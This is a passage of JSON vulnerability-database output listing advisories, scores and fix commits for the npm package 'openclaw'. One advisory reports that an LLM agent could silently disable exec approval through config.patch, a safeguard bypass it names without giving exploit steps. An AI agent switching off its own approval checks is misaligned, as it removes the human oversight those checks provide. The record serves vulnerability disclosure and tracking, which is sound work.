"vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.9" } ], "aliases": [ "CVE-2026-43569", "GHSA-939r-rj45-g2rj" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-arks-g6hw-abbw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91806?format=api", "vulnerability_id": "VCID-asuy-amja-eyd4", "summary": "OpenClaw: Synology Chat reply delivery could be rebound through username-based user resolution.\n## Summary\nSynology Chat reply delivery could rebind to a mutable username match instead of the stable numeric user_id recorded by the webhook event.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `7ade3553b74ee3f461c4acd216653d5ba411f455`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/synology-chat/src/webhook-handler.ts now keeps replies bound to the stable webhook user identifier unless an explicit dangerous opt-in is enabled.\n- extensions/synology-chat/src/config-schema.ts contains the explicit dangerous opt-in seam instead of silent username rebinding.\n\nOpenClaw thanks @nexrin for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35670", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26596", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26636", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26645", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35670" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:59:29Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/7ade3553b74ee3f461c4acd216653d5ba411f455", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:59:29Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/7ade3553b74ee3f461c4acd216653d5ba411f455" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wv46-v6xc-2qhf", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:59:29Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wv46-v6xc-2qhf" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35670", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35670" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-webhook-reply-rebinding-via-username-resolution-in-synology-chat", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:59:29Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-webhook-reply-rebinding-via-username-resolution-in-synology-chat" }, { "reference_url": "https://github.com/advisories/GHSA-wv46-v6xc-2qhf", "reference_id": "GHSA-wv46-v6xc-2qhf", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wv46-v6xc-2qhf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35670", "GHSA-wv46-v6xc-2qhf" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-asuy-amja-eyd4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90150?format=api", "vulnerability_id": "VCID-atn7-pn13-3fgb", "summary": "OpenClaw: Agentic Consent Bypass — LLM Agent Can Silently Disable Exec Approval via `config.patch`\n## Summary\nAgentic Consent Bypass: LLM Agent Can Silently Disable Exec Approval via `config.patch`\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Maintainers accepted this issue, fixed it in 76411b2afc4ae721e36c12e0ea24fd23e2fed61e on 2026-03-27, and that fix shipped in v2026.3.28, so normalize it as a fixed released draft rather than a close-by-trust-model call.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `76411b2afc4ae721e36c12e0ea24fd23e2fed61e` — 2026-03-27T09:42:15Z\n\nOpenClaw thanks @YLChen-007 for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/76411b2afc4ae721e36c12e0ea24fd23e2fed61e", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/76411b2afc4ae721e36c12e0ea24fd23e2fed61e" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v3qc-wrwx-j3pw", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v3qc-wrwx-j3pw" }, { "reference_url": "https://github.com/advisories/GHSA-v3qc-wrwx-j3pw", "reference_id": "GHSA-v3qc-wrwx-j3pw", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-v3qc-wrwx-j3pw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": 